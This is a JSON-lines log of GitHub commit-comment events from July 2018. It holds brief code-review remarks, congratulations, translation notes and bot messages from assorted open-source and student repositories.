{"id":"7974351672","type":"CommitCommentEvent","actor":{"login":"tomtor"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29729754,"position":null,"line":null,"path":null,"commit_id":"bd6dc85c21d03f47a5bbec1879b6b426a2ecfcdc","created_at":"2018-07-17T04:59:31Z","updated_at":"2018-07-17T04:59:31Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-17T04:59:31Z"}
{"id":"7974352377","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29729756,"position":10,"line":10,"path":"9.jason and pickle","commit_id":"41d084fc6702ac3f374eba8239d6d15a6fd30438","created_at":"2018-07-17T04:59:48Z","updated_at":"2018-07-17T04:59:48Z","author_association":"OWNER","body":"```\r\n#Downtiser\r\n\r\nimport pickle\r\n\r\ndef fun1(name):\r\n    print(name)\r\n\r\nf=open('exam.txt','rb')\r\ndata=pickle.loads(f.read())\r\ndata['func']('downtiser')\r\n```"}},"created_at":"2018-07-17T04:59:48Z"}
{"id":"7974353828","type":"CommitCommentEvent","actor":{"login":"binarymist"},"repo":{"name":"binarymist/mailgun-mate"},"payload":{"comment":{"id":29729766,"position":null,"line":null,"path":null,"commit_id":"1dc8d2a3525ecd62cf81e8dac43f186c73ad5b49","created_at":"2018-07-17T05:00:20Z","updated_at":"2018-07-17T05:00:20Z","author_association":"OWNER","body":"As per #3 "}},"created_at":"2018-07-17T05:00:20Z"}
{"id":"7974355873","type":"CommitCommentEvent","actor":{"login":"EnterTheBlackDragon36"},"repo":{"name":"EnterTheBlackDragon36/Hello-World"},"payload":{"comment":{"id":29729776,"position":null,"line":null,"path":null,"commit_id":"3814a90bbc12e187cb70779c5ef122b3d8332235","created_at":"2018-07-17T05:01:06Z","updated_at":"2018-07-17T05:01:06Z","author_association":"OWNER","body":"Initial Commit of first gitHub Account"}},"created_at":"2018-07-17T05:01:06Z"}
{"id":"7974356168","type":"CommitCommentEvent","actor":{"login":"tomtor"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":29729777,"position":null,"line":null,"path":null,"commit_id":"bc67565e37f866955cf31188049755323a395dd1","created_at":"2018-07-17T05:01:12Z","updated_at":"2018-07-17T05:01:12Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-17T05:01:12Z"}
{"id":"7974357433","type":"CommitCommentEvent","actor":{"login":"iBublik"},"repo":{"name":"Savelov-Vitaliy/test-guru"},"payload":{"comment":{"id":29729782,"position":23,"line":28,"path":"app/models/test_passage.rb","commit_id":"6db07176a4c918ead8609192dbbaeab9cc9c4f81","created_at":"2018-07-17T05:01:41Z","updated_at":"2018-07-17T05:01:41Z","author_association":"NONE","body":"Здесь лучше во float считать. Так будет больше точности. Если в отображении нужно целое число, его можно прямо там округлить"}},"created_at":"2018-07-17T05:01:41Z"}
{"id":"7974359355","type":"CommitCommentEvent","actor":{"login":"Datshv"},"repo":{"name":"Datshv/pruebaJenkins"},"payload":{"comment":{"id":29729783,"position":null,"line":null,"path":null,"commit_id":"3ef79de7ab8702f9c075a9f8079962df2c7ee51a","created_at":"2018-07-17T05:02:27Z","updated_at":"2018-07-17T05:02:27Z","author_association":"OWNER","body":"df"}},"created_at":"2018-07-17T05:02:27Z"}
{"id":"7974360469","type":"CommitCommentEvent","actor":{"login":"iBublik"},"repo":{"name":"Savelov-Vitaliy/test-guru"},"payload":{"comment":{"id":29729787,"position":38,"line":41,"path":"app/models/test_passage.rb","commit_id":"6db07176a4c918ead8609192dbbaeab9cc9c4f81","created_at":"2018-07-17T05:02:54Z","updated_at":"2018-07-17T05:02:54Z","author_association":"NONE","body":"Не понимаю зачем еще один метод создавать. Почему это в `next_question` не сделать? Ведь это все логика получения следующего вопроса"}},"created_at":"2018-07-17T05:02:54Z"}
{"id":"7974364300","type":"CommitCommentEvent","actor":{"login":"iBublik"},"repo":{"name":"Savelov-Vitaliy/test-guru"},"payload":{"comment":{"id":29729800,"position":39,"line":42,"path":"app/models/test_passage.rb","commit_id":"6db07176a4c918ead8609192dbbaeab9cc9c4f81","created_at":"2018-07-17T05:04:25Z","updated_at":"2018-07-17T05:04:25Z","author_association":"NONE","body":"Для чего тут проверка на наличие теста? Если она не пройдет, запустится метод `next_question`, а там ты все равно на тест полагаешься.\r\nВообще это бесполезно делать, до сохранения просто не дойдет дело - в Rails 5 все belongs_to связи по умолчанию обязательны. валидация не даст сохранить запись без теста"}},"created_at":"2018-07-17T05:04:25Z"}
{"id":"7974366380","type":"CommitCommentEvent","actor":{"login":"iBublik"},"repo":{"name":"Savelov-Vitaliy/test-guru"},"payload":{"comment":{"id":29729803,"position":57,"line":54,"path":"app/models/test_passage.rb","commit_id":"6db07176a4c918ead8609192dbbaeab9cc9c4f81","created_at":"2018-07-17T05:05:12Z","updated_at":"2018-07-17T05:05:12Z","author_association":"NONE","body":"Тут можно без всяких условий записать - `Array(answer_ids).map(&:to_i).sort`"}},"created_at":"2018-07-17T05:05:12Z"}
{"id":"7974375340","type":"CommitCommentEvent","actor":{"login":"cbalster"},"repo":{"name":"osmdroid/osmdroid"},"payload":{"comment":{"id":29729820,"position":6,"line":11,"path":".travis.yml","commit_id":"62a7a2698afaad1469f7cb4d27b75a5f03bd74cc","created_at":"2018-07-17T05:08:54Z","updated_at":"2018-07-17T05:08:54Z","author_association":"CONTRIBUTOR","body":"why not 26.0.2?"}},"created_at":"2018-07-17T05:08:54Z"}
{"id":"7974378906","type":"CommitCommentEvent","actor":{"login":"abitrolly"},"repo":{"name":"genuinetools/reg"},"payload":{"comment":{"id":29729824,"position":null,"line":null,"path":null,"commit_id":"3c014c999a3062cb489f38e2e595baf721314cd4","created_at":"2018-07-17T05:10:17Z","updated_at":"2018-07-17T05:10:17Z","author_association":"CONTRIBUTOR","body":"Articles are so hard."}},"created_at":"2018-07-17T05:10:17Z"}
{"id":"7974386239","type":"CommitCommentEvent","actor":{"login":"DaveyEdwards"},"repo":{"name":"MyiWorlds/myiworlds.frontend"},"payload":{"comment":{"id":29729835,"position":null,"line":null,"path":null,"commit_id":"d80f16a309518d8b2cf5c585729941a4d7af80b1","created_at":"2018-07-17T05:13:15Z","updated_at":"2018-07-17T05:13:15Z","author_association":"CONTRIBUTOR","body":"Problem is its quite complicated to have to pass more variables to the server then it is to just declare the data you want in the query filters.\r\n\r\nOne problem that hasnt been resolved in this is that the data does not consolidate the data creating more cards with results below\r\n\r\n![2018-07-16_22-06-57](https://user-images.githubusercontent.com/15203899/42797578-b92ea72c-8944-11e8-93d3-1f67efa2ab07.gif)\r\n"}},"created_at":"2018-07-17T05:13:15Z"}
{"id":"7974386548","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29729837,"position":null,"line":null,"path":null,"commit_id":"ac0053f491e6604f943ecb7d10f400d7d1d80d4a","created_at":"2018-07-17T05:13:22Z","updated_at":"2018-07-17T05:13:22Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/navigate-to-first-post-after-topics-are-read-category-setting/92516/1\n"}},"created_at":"2018-07-17T05:13:22Z"}
{"id":"7974392724","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29729847,"position":null,"line":null,"path":null,"commit_id":"6227bb9220794571b982080fb3de37128cfae718","created_at":"2018-07-17T05:15:47Z","updated_at":"2018-07-17T05:15:47Z","author_association":"MEMBER","body":"With https://github.com/opnsense/core/commit/922c341974fe8db1cd0cacff51b0f412cc3e5e73 I now get this:\r\n\r\n```\r\nblock in log quick on wan_stf from {<bogons>} to {any} label \"block bogon IPv4 networks from WAN\"\r\nblock in log quick on wan_stf from {<bogonsv6>} to {any} label \"block bogon IPv6 networks from WAN\"\r\nblock in log quick on wan_stf from {10.0.0.0/8,127.0.0.0/8,100.64.0.0/10,172.16.0.0/12,192.168.0.0/16,fc00::/7} to {any} label \"Block private networks from WAN\"\r\n```\r\n\r\nDoes that look reasonable to you?"}},"created_at":"2018-07-17T05:15:47Z"}
{"id":"7974393253","type":"CommitCommentEvent","actor":{"login":"calincan2000"},"repo":{"name":"calincan2000/AdvancedAndroid_Shushme"},"payload":{"comment":{"id":29729848,"position":13,"line":13,"path":"app/src/main/AndroidManifest.xml","commit_id":"7124dfddd94014569e48ef2a3183de5bce005fb4","created_at":"2018-07-17T05:16:01Z","updated_at":"2018-07-17T05:16:01Z","author_association":"OWNER","body":"  \r\nAPI Key Setup Instructions\r\nGo to the Google API Console.\r\nhttps://console.developers.google.com/flows/enableapi?apiid=placesandroid&reusekey=true\r\nCreate or select a project.\r\nClick Continue to enable the Google Places API for Android.\r\nOn the Credentials page, get an API key.\r\nNote: If you have an existing API key with Android restrictions, you may use that key.\r\nRestricting your API key\r\nTo control who can use this key to access Google's API; restrict the key to a certain Android app\r\nFrom the dialog displaying the API key, select Restrict key to set an Android restriction on the API key.\r\nIn the Restrictions section, select Android apps, then enter your app's SHA-1 fingerprint and package name. For example: BB:0D:AC:74:D3:21:E1:43:67:71:9B:62:91:AF:A1:66:6E:44:5D:75 com.example.android.places-example\r\nClick Save.\r\n"}},"created_at":"2018-07-17T05:16:01Z"}
{"id":"7974394616","type":"CommitCommentEvent","actor":{"login":"lipingpeng"},"repo":{"name":"lipingpeng/plp-vm"},"payload":{"comment":{"id":29729851,"position":2116,"line":2129,"path":"v1.txt","commit_id":"df8100181d228b0ff95447550231512b88eaf66b","created_at":"2018-07-17T05:16:34Z","updated_at":"2018-07-17T05:16:34Z","author_association":"OWNER","body":"两个文档里面都没有"}},"created_at":"2018-07-17T05:16:34Z"}
{"id":"7974396496","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29729855,"position":null,"line":null,"path":null,"commit_id":"3c154f33c40dd9cf6f578f43701e8034cedf1714","created_at":"2018-07-17T05:17:20Z","updated_at":"2018-07-17T05:17:20Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-age-filt](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-age-filt).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-age-filt-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-17T05:17:20Z"}
{"id":"7974397842","type":"CommitCommentEvent","actor":{"login":"nohjiho"},"repo":{"name":"nohjiho/bestpractice80.github.io"},"payload":{"comment":{"id":29729858,"position":null,"line":null,"path":null,"commit_id":"7f654aa5c4197cbfc48258150ec4c7d4f430f895","created_at":"2018-07-17T05:17:53Z","updated_at":"2018-07-17T05:17:53Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-17T05:17:53Z"}
{"id":"7974398044","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29729859,"position":1,"line":null,"path":"1531804675.63/github_test.txt","commit_id":"c331bca5e67fc8de95b3e49a0a243fd54f66f279","created_at":"2018-07-17T05:17:58Z","updated_at":"2018-07-17T05:17:58Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-17T05:17:58Z"}
{"id":"7974398327","type":"CommitCommentEvent","actor":{"login":"katienazarova"},"repo":{"name":"the-road-to-learn-react/the-road-to-learn-react-russian"},"payload":{"comment":{"id":29729860,"position":305,"line":919,"path":"manuscript/chapter2.md","commit_id":"4cce8e703e973d20184b89a200e0eaa4b58a2b1c","created_at":"2018-07-17T05:18:05Z","updated_at":"2018-07-17T05:18:05Z","author_association":"NONE","body":"Я пропустила один момент, \"функции высокого порядка\" - тут не нужно написать \"функции высшего порядка\"? И соответственно, \"компонентами высшего порядка\"?"}},"created_at":"2018-07-17T05:18:05Z"}
{"id":"7974401313","type":"CommitCommentEvent","actor":{"login":"katienazarova"},"repo":{"name":"the-road-to-learn-react/the-road-to-learn-react-russian"},"payload":{"comment":{"id":29729870,"position":374,"line":1075,"path":"manuscript/chapter2.md","commit_id":"4cce8e703e973d20184b89a200e0eaa4b58a2b1c","created_at":"2018-07-17T05:19:10Z","updated_at":"2018-07-17T05:19:10Z","author_association":"NONE","body":"компонента App.. - лишняя точка"}},"created_at":"2018-07-17T05:19:10Z"}
{"id":"7974402275","type":"CommitCommentEvent","actor":{"login":"pqqhappy"},"repo":{"name":"pqqhappy/git"},"payload":{"comment":{"id":29729871,"position":null,"line":null,"path":null,"commit_id":"3317f83035e385fd77b383c1776e3b528e5e4d9b","created_at":"2018-07-17T05:19:34Z","updated_at":"2018-07-17T05:19:34Z","author_association":"OWNER","body":"happy happy"}},"created_at":"2018-07-17T05:19:34Z"}
{"id":"7974405905","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":29729876,"position":null,"line":null,"path":null,"commit_id":"bc67565e37f866955cf31188049755323a395dd1","created_at":"2018-07-17T05:21:00Z","updated_at":"2018-07-17T05:21:00Z","author_association":"NONE","body":"Well done!"}},"created_at":"2018-07-17T05:21:00Z"}
{"id":"7974407065","type":"CommitCommentEvent","actor":{"login":"majekolaitan"},"repo":{"name":"majekolaitan/Robotfriends"},"payload":{"comment":{"id":29729877,"position":null,"line":null,"path":null,"commit_id":"124b0d8d823bc4508051475325f66be05211620e","created_at":"2018-07-17T05:21:27Z","updated_at":"2018-07-17T05:21:27Z","author_association":"OWNER","body":"in a real life app We wouldn't necessarily have these robots written in robots array. We would use something like an API."}},"created_at":"2018-07-17T05:21:27Z"}
{"id":"7974409007","type":"CommitCommentEvent","actor":{"login":"katienazarova"},"repo":{"name":"the-road-to-learn-react/the-road-to-learn-react-russian"},"payload":{"comment":{"id":29729880,"position":null,"line":null,"path":null,"commit_id":"4cce8e703e973d20184b89a200e0eaa4b58a2b1c","created_at":"2018-07-17T05:22:12Z","updated_at":"2018-07-17T05:22:12Z","author_association":"NONE","body":"@lex111 добавила пару небольших комментариев, в остальном всё ок"}},"created_at":"2018-07-17T05:22:12Z"}
{"id":"7974409152","type":"CommitCommentEvent","actor":{"login":"majekolaitan"},"repo":{"name":"majekolaitan/Robotfriends"},"payload":{"comment":{"id":29729881,"position":null,"line":null,"path":null,"commit_id":"124b0d8d823bc4508051475325f66be05211620e","created_at":"2018-07-17T05:22:15Z","updated_at":"2018-07-17T05:22:15Z","author_association":"OWNER","body":"Well we want when this Web site gets loaded to make a request somewhere out there in the world or the internet and grab these robots from a server."}},"created_at":"2018-07-17T05:22:15Z"}
{"id":"7974409440","type":"CommitCommentEvent","actor":{"login":"hakavlad"},"repo":{"name":"rfjakob/earlyoom"},"payload":{"comment":{"id":29729882,"position":null,"line":null,"path":null,"commit_id":"b8b3c321ff5e40283c12b96d318bde354aed0421","created_at":"2018-07-17T05:22:23Z","updated_at":"2018-07-17T05:22:23Z","author_association":"NONE","body":"Excellent. Now htop always displays 0.0% for earlyoom on my Debian instead of 0 - 0.7%."}},"created_at":"2018-07-17T05:22:23Z"}
{"id":"7974427940","type":"CommitCommentEvent","actor":{"login":"wlsgussla123"},"repo":{"name":"yonghyun123/BOJ"},"payload":{"comment":{"id":29729920,"position":null,"line":null,"path":null,"commit_id":"f8d3dde51702c93d340cb694fa911d011a613627","created_at":"2018-07-17T05:29:21Z","updated_at":"2018-07-17T05:29:21Z","author_association":"NONE","body":"BFS를 시작하셨군요."}},"created_at":"2018-07-17T05:29:21Z"}
{"id":"7974442659","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29729935,"position":null,"line":null,"path":null,"commit_id":"afa73ed612a76bc24a2d4df7786361643f8e7a97","created_at":"2018-07-17T05:33:11Z","updated_at":"2018-07-17T05:33:11Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-fpg-filt](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-fpg-filt).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-fpg-filt-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-17T05:33:11Z"}
{"id":"7974443577","type":"CommitCommentEvent","actor":{"login":"Scrity1976"},"repo":{"name":"Scrity1976/exilopanel-core"},"payload":{"comment":{"id":29729939,"position":null,"line":null,"path":null,"commit_id":"cc1734c68b6c895dc7cae95033f425d54598862c","created_at":"2018-07-17T05:33:25Z","updated_at":"2018-07-17T05:33:25Z","author_association":"OWNER","body":"Broken. Do not use."}},"created_at":"2018-07-17T05:33:25Z"}
{"id":"7974446840","type":"CommitCommentEvent","actor":{"login":"majekolaitan"},"repo":{"name":"majekolaitan/Robotfriends"},"payload":{"comment":{"id":29729945,"position":null,"line":null,"path":null,"commit_id":"124b0d8d823bc4508051475325f66be05211620e","created_at":"2018-07-17T05:34:36Z","updated_at":"2018-07-17T05:34:36Z","author_association":"OWNER","body":"lifecycle hooks - automatically trigger when this app gets loaded on the Web site."}},"created_at":"2018-07-17T05:34:36Z"}
{"id":"7974450512","type":"CommitCommentEvent","actor":{"login":"majekolaitan"},"repo":{"name":"majekolaitan/Robotfriends"},"payload":{"comment":{"id":29729949,"position":null,"line":null,"path":null,"commit_id":"124b0d8d823bc4508051475325f66be05211620e","created_at":"2018-07-17T05:36:03Z","updated_at":"2018-07-17T05:36:03Z","author_association":"OWNER","body":"ComponentDidMount is used as it get called after the app component is mounted on the webpage and rendered"}},"created_at":"2018-07-17T05:36:03Z"}
{"id":"7974451755","type":"CommitCommentEvent","actor":{"login":"aikar"},"repo":{"name":"aikar/Bukkit"},"payload":{"comment":{"id":29729950,"position":null,"line":null,"path":null,"commit_id":"a3f1790216e245cd121fea19254e87ab3603c8d4","created_at":"2018-07-17T05:36:31Z","updated_at":"2018-07-17T05:36:31Z","author_association":"OWNER","body":"```java\r\n    public MaterialSetTag LOCKABLE = new MaterialSetTag()\r\n        .add(Tags.SHULKER_BOXES)\r\n        .add(Tags.BEDS)\r\n        .add(Tags.SKULLS)\r\n        .add(Material.CHEST)\r\n        .add(Material.TRAPPED_CHEST)\r\n        .add(Material.HOPPER)\r\n        .add(Material.DROPPER)\r\n        .add(Material.FURNACE)\r\n        .add(Material.BREWING_STAND)\r\n        .add(Material.DISPENSER)\r\n        .add(Material.SPAWNER)\r\n        .add(Material.ENCHANTING_TABLE)\r\n        .add(Material.CAULDRON)\r\n        .add(Material.CRAFTING_TABLE)\r\n        .add(Material.JUKEBOX)\r\n        .add(Material.NOTE_BLOCK)\r\n        .add(Material.BEACON);\r\n```"}},"created_at":"2018-07-17T05:36:31Z"}
{"id":"7974454833","type":"CommitCommentEvent","actor":{"login":"DrRamm"},"repo":{"name":"openthos/oto_system_vold"},"payload":{"comment":{"id":29729955,"position":null,"line":null,"path":null,"commit_id":"7df20f8c1c12bb78f15a9d9905e5dd5a91c66830","created_at":"2018-07-17T05:37:43Z","updated_at":"2018-07-17T05:37:43Z","author_association":"NONE","body":"@faxiang1230 thanks u "}},"created_at":"2018-07-17T05:37:43Z"}
{"id":"7974455755","type":"CommitCommentEvent","actor":{"login":"wuweiweiwu"},"repo":{"name":"frontend-collective/react-sortable-tree"},"payload":{"comment":{"id":29729958,"position":60,"line":155,"path":"src/react-sortable-tree.js","commit_id":"c844c04b6248103ca42ae80e417679741c5607cd","created_at":"2018-07-17T05:38:04Z","updated_at":"2018-07-17T05:38:04Z","author_association":"MEMBER","body":"Nice catch. Ill have to patch that"}},"created_at":"2018-07-17T05:38:04Z"}
{"id":"7974459965","type":"CommitCommentEvent","actor":{"login":"dschaper"},"repo":{"name":"pi-hole/pi-hole"},"payload":{"comment":{"id":29729970,"position":null,"line":null,"path":null,"commit_id":"a323b126e5ea89d4f54f6dfffdbb52a126a19449","created_at":"2018-07-17T05:39:38Z","updated_at":"2018-07-17T05:39:38Z","author_association":"MEMBER","body":"See #2284 "}},"created_at":"2018-07-17T05:39:38Z"}
{"id":"7974460986","type":"CommitCommentEvent","actor":{"login":"RandyCalderon"},"repo":{"name":"RandyCalderon/front-end-project-week"},"payload":{"comment":{"id":29729973,"position":null,"line":null,"path":null,"commit_id":"a5523502aee56e8161495d37a03d7553ed46bd7e","created_at":"2018-07-17T05:39:59Z","updated_at":"2018-07-17T05:39:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Display a list of notes](https://trello.com/c/AJRpG3Fh/1-display-a-list-of-notes)"}},"created_at":"2018-07-17T05:39:59Z"}
{"id":"7974463486","type":"CommitCommentEvent","actor":{"login":"rikyperdana"},"repo":{"name":"rikyperdana/mithril-autoform"},"payload":{"comment":{"id":29729976,"position":null,"line":null,"path":null,"commit_id":"741d92e0c35fc5d4b48f0b4bcda020ecefdcb070","created_at":"2018-07-17T05:40:57Z","updated_at":"2018-07-17T05:40:57Z","author_association":"OWNER","body":"Such big changes emerged since application of this lib on Hospital scheme"}},"created_at":"2018-07-17T05:40:57Z"}
{"id":"7974469125","type":"CommitCommentEvent","actor":{"login":"rikyperdana"},"repo":{"name":"rikyperdana/mithril-autoform"},"payload":{"comment":{"id":29729985,"position":null,"line":null,"path":null,"commit_id":"741d92e0c35fc5d4b48f0b4bcda020ecefdcb070","created_at":"2018-07-17T05:43:04Z","updated_at":"2018-07-17T05:43:04Z","author_association":"OWNER","body":"Just to remind myself to opt-out the reducer function each time reduce method is being used"}},"created_at":"2018-07-17T05:43:04Z"}
{"id":"7974475478","type":"CommitCommentEvent","actor":{"login":"ranjithkraghavan"},"repo":{"name":"ranjithkraghavan/flow-demo"},"payload":{"comment":{"id":29729999,"position":null,"line":null,"path":null,"commit_id":"6e204249f85c23025a0399474c0a749348353151","created_at":"2018-07-17T05:45:22Z","updated_at":"2018-07-17T05:45:22Z","author_association":"OWNER","body":"Minor change made in the code"}},"created_at":"2018-07-17T05:45:22Z"}
{"id":"7974485710","type":"CommitCommentEvent","actor":{"login":"masters3d"},"repo":{"name":"apple/swift-package-manager"},"payload":{"comment":{"id":29730013,"position":200,"line":292,"path":"Sources/PackageDescription4/Package.swift","commit_id":"f2988906bff5362881d7dda17f740a658e662bb5","created_at":"2018-07-17T05:49:08Z","updated_at":"2018-07-17T05:49:08Z","author_association":"CONTRIBUTOR","body":"Should these be tagged 4 and 4.2? I am seeing version 4 is not inclusive of 4.2, is the plan? \r\nhttps://github.com/exercism/swift/blob/master/Package.swift\r\nhttps://ci.swift.org/job/swift-PR-source-compat-suite-test-macOS/260/artifact/swift-source-compat-suite/FAIL_xswift_4.2_BuildSwiftPackage.log\r\n\r\nhttps://github.com/apple/swift-source-compat-suite/pull/192#issuecomment-405463910"}},"created_at":"2018-07-17T05:49:08Z"}
{"id":"7974486134","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29730014,"position":63,"line":707,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"2751eb5c67451bfe4f4bc5163101da01b20c87a0","created_at":"2018-07-17T05:49:16Z","updated_at":"2018-07-17T05:49:16Z","author_association":"COLLABORATOR","body":"This could be __münkir__ if it means like rejector, denier"}},"created_at":"2018-07-17T05:49:16Z"}
{"id":"7974486589","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29730015,"position":58,"line":256,"path":"compile.rkt","commit_id":"e6d3881dc96c78fc8815c9a6f6f92da57223e360","created_at":"2018-07-17T05:49:26Z","updated_at":"2018-07-17T05:49:26Z","author_association":"OWNER","body":"I don't understand. The functions are named here so they are necessarily uniquely named and when they are used elsewhere, they don't have names, so the code won't be able to tell what name you give them."}},"created_at":"2018-07-17T05:49:26Z"}
{"id":"7974488290","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29730017,"position":65,"line":258,"path":"compile.rkt","commit_id":"e6d3881dc96c78fc8815c9a6f6f92da57223e360","created_at":"2018-07-17T05:50:01Z","updated_at":"2018-07-17T05:50:01Z","author_association":"OWNER","body":"Sigma should be a map from function to string, there's no need for symbol because there are no symbols in C code and it is a mapping from functions to their C name"}},"created_at":"2018-07-17T05:50:01Z"}
{"id":"7974489333","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29730019,"position":73,"line":265,"path":"compile.rkt","commit_id":"e6d3881dc96c78fc8815c9a6f6f92da57223e360","created_at":"2018-07-17T05:50:23Z","updated_at":"2018-07-17T05:50:23Z","author_association":"OWNER","body":"Why a copy? Why not just do (in-hash-keys Sigma)?"}},"created_at":"2018-07-17T05:50:23Z"}
{"id":"7974490147","type":"CommitCommentEvent","actor":{"login":"Avanpourm"},"repo":{"name":"Avanpourm/go"},"payload":{"comment":{"id":29730020,"position":null,"line":null,"path":null,"commit_id":"07f09ebaeca32836840c17fa87ac4c627ffa18aa","created_at":"2018-07-17T05:50:40Z","updated_at":"2018-07-17T05:50:40Z","author_association":"OWNER","body":"merge from orgin"}},"created_at":"2018-07-17T05:50:40Z"}
{"id":"7974491425","type":"CommitCommentEvent","actor":{"login":"jeapostrophe"},"repo":{"name":"jeapostrophe/adqc"},"payload":{"comment":{"id":29730024,"position":84,"line":274,"path":"compile.rkt","commit_id":"e6d3881dc96c78fc8815c9a6f6f92da57223e360","created_at":"2018-07-17T05:51:07Z","updated_at":"2018-07-17T05:51:07Z","author_association":"OWNER","body":"I think this is an infinite loop because you aren't changing the queue. Also, make sure you change it BEFORE you go into compile-fun"}},"created_at":"2018-07-17T05:51:07Z"}
{"id":"7974492500","type":"CommitCommentEvent","actor":{"login":"eclipse2007"},"repo":{"name":"LitePalFramework/LitePal"},"payload":{"comment":{"id":29730025,"position":null,"line":null,"path":null,"commit_id":"34d4c36ae050e94dae70573cc94ce65ff588bd87","created_at":"2018-07-17T05:51:29Z","updated_at":"2018-07-17T05:51:29Z","author_association":"NONE","body":"nice"}},"created_at":"2018-07-17T05:51:29Z"}
{"id":"7974492674","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29730026,"position":84,"line":728,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"2751eb5c67451bfe4f4bc5163101da01b20c87a0","created_at":"2018-07-17T05:51:32Z","updated_at":"2018-07-17T05:51:32Z","author_association":"COLLABORATOR","body":"I can't think of a transitive _ula_ in Turkish"}},"created_at":"2018-07-17T05:51:32Z"}
{"id":"7974492695","type":"CommitCommentEvent","actor":{"login":"dadoonet"},"repo":{"name":"oncletom/nodebook"},"payload":{"comment":{"id":29730027,"position":101,"line":1498,"path":"chapter-07/index.adoc","commit_id":"e40f2618d3650b66106ac28ad66f3af10e666c59","created_at":"2018-07-17T05:51:32Z","updated_at":"2018-07-17T05:51:32Z","author_association":"NONE","body":"s/ElasticSearch/Elasticsearch ?"}},"created_at":"2018-07-17T05:51:32Z"}
{"id":"7974494988","type":"CommitCommentEvent","actor":{"login":"zsau"},"repo":{"name":"quodlibet/quodlibet"},"payload":{"comment":{"id":29730030,"position":5,"line":54,"path":"quodlibet/quodlibet/qltk/views.py","commit_id":"4f8c38cd3c351efe1cbe160cb96aafbefd23f04f","created_at":"2018-07-17T05:52:22Z","updated_at":"2018-07-17T05:52:22Z","author_association":"CONTRIBUTOR","body":"It seems this change is the culprit, but I can't figure out why the behavior differs. I've tried setting `yalign = 0.5` explicitly (even though that's the default), and I've also tried using `halign`/`valign` to no avail. The original source code for `gtk_misc_set_alignment` doesn't seem to be doing anything weird, either."}},"created_at":"2018-07-17T05:52:22Z"}
{"id":"7974495585","type":"CommitCommentEvent","actor":{"login":"Andrei-Masilevich"},"repo":{"name":"scorum/scorum"},"payload":{"comment":{"id":29730032,"position":14,"line":93,"path":"libraries/chain/database/block_tasks/comments_cashout_impl.cpp","commit_id":"1803697abc07eda3c539882c8cfc123e95e0fde1","created_at":"2018-07-17T05:52:34Z","updated_at":"2018-07-17T05:52:34Z","author_association":"CONTRIBUTOR","body":"This is done so that there was no case when someone forgot to analyze the boundaries in the new code. If we leave the usual multiplication, we will create a bad example"}},"created_at":"2018-07-17T05:52:34Z"}
{"id":"7974498892","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29730036,"position":22,"line":666,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"2751eb5c67451bfe4f4bc5163101da01b20c87a0","created_at":"2018-07-17T05:53:42Z","updated_at":"2018-07-17T05:53:42Z","author_association":"COLLABORATOR","body":"Determiner?"}},"created_at":"2018-07-17T05:53:42Z"}
{"id":"7974504653","type":"CommitCommentEvent","actor":{"login":"Savelov-Vitaliy"},"repo":{"name":"Savelov-Vitaliy/test-guru"},"payload":{"comment":{"id":29730058,"position":57,"line":54,"path":"app/models/test_passage.rb","commit_id":"6db07176a4c918ead8609192dbbaeab9cc9c4f81","created_at":"2018-07-17T05:55:40Z","updated_at":"2018-07-17T05:55:40Z","author_association":"OWNER","body":"хорошая идея с Array(answer_ids)"}},"created_at":"2018-07-17T05:55:40Z"}
